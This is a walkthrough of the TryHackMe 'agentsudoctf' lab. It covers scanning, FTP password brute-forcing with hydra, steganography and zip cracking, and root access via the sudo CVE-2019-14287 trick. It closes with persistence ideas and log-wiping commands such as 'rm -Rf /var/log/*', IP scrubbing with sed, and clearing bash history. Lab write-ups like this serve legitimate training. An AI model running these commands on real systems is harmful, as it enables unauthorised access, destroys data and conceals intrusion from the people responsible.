Skip to content
Hackatorium

THM:agentsudoctf

agentsudoctf

URL: https://tryhackme.com/room/agentsudoctf   Easy

PHASE 1: Reconnaissance

Description of the room:

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/index.php            (Status: 200) [Size: 218]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h xxx.xxx.xxx.xxx

Interesting info found:

--Nothing really--

Also see: nikto.log

PHASE 3: Gaining Access

There isn’t anything too interesting from scanning. We navigate to the web server running on this server and see:

Dear agents,


Use your own codename as user-agent to access the site.


From,
Agent R

Per the instructions on the main web page, you can pass in your Agent name as the User-Agent on the web page to gain access. Since it was signed by “R”, we can systematically try other letters. For example:

Terminal window
curl -H "User-Agent: C" -L http://10.10.13.116

From that, we can discern the username of “C”. Since both SSH and FTP are services, let’s try hydra against FTP with:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.13.116 ftp

Sure enough, from that, we capture the FTP password for user chris.

Also see: hydra.log

Unprivileged Access

When we log into FTP as Chris, we have 3 files:

We find out from the text file:

Dear agent J,


All these alien like photos are fake! Agent R stored the real picture
inside your directory. Your login password is somehow stored in the fake
picture. It shouldn't be a problem for you.


From,
Agent C

By running:

Terminal window
steghide info ./cute-alien.jpg

We find that cute-alien.jpg has password-protected data in it. Using binwalk:

Terminal window
binwalk ./cutie.png

We can see there is a .zip file embedded within:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

So, we can do a:

Terminal window
binwalk -e ./cutie.png

to extract (-e) the hidden .zip file. That puts the embedded data into a _cutie.png.extracted subfolder. Within there, we have some files:

Terminal window
365
365.zlib
8702.zip
To_agentR.txt

The .zip file seems to be password-protected, so we can send that to John to crack:

Terminal window
zip2john ./8702.zip > ./8702.zip.hash

and then:

Terminal window
john ./8702.zip.hash

and very quickly, John finishes with the .zip file password:

Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
alien            (8702.zip/To_agentR.txt)

Also see: john.log

Now that we have the .zip file password, we can unzip the contents:

Terminal window
7z e ./8702.zip

We enter the password and To_agentR.txt gets extracted. The contents give us a perhaps-encoded word:

Agent C,


We need to send the picture to 'QXJlYTUx' as soon as possible!


By,
Agent R

Using a website like https://www.base64decode.org/, we can pass in the value QXJlYTUx and get the value Area51.

We might assume that is the steg password for the other image. We try that:

Terminal window
steghide extract -sf ./cute-alien.jpg

That wrote out it’s contents to message.txt which is addressed to james and appears to have his password.

Let’s try that username/password over SSH - and sure-enough, we can log in and get the user flag, and the picture for the bonus question.

Privilege Escalation

We check to see if have any sudo privileges with sudo -l and we see an odd:

(ALL, !root) /bin/bash

By looking this up on the internet, we find an associated CVE-2019–14287

To run the exploit, instead of the intuitive:

Terminal window
sudo /bin/bash

Per the CVE writeups, you’d do the following to get a root prompt:

Terminal window
sudo -u#-1 /bin/bash

PHASE 4: Maintaining Access

This is a test/CTF machine, so this is out of scope. However, in a Red Team scenario, we could:

  • Add SSH key to /root/.ssh/authorized_keys
  • Create a privileged account that wouldn’t draw attention (ex: operations) or an unprivileged account and give it sudo access via group or directly in the /etc/sudoers file.
  • Install some other backdoor or service.

PHASE 5: Clearing Tracks

This is a test machine. However, in a Red Team scenario, we could:

Delete relevant logs from /var/log/ - although that might draw attention

rm -Rf /var/log/*

Search and replace our IP address in all logs via

find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

Wipe bash history for any accounts we used via

cat /dev/null > /root/.bash_history

cat /dev/null > /home/kathy/.bash_history

cat /dev/null > /home/sam/.bash_history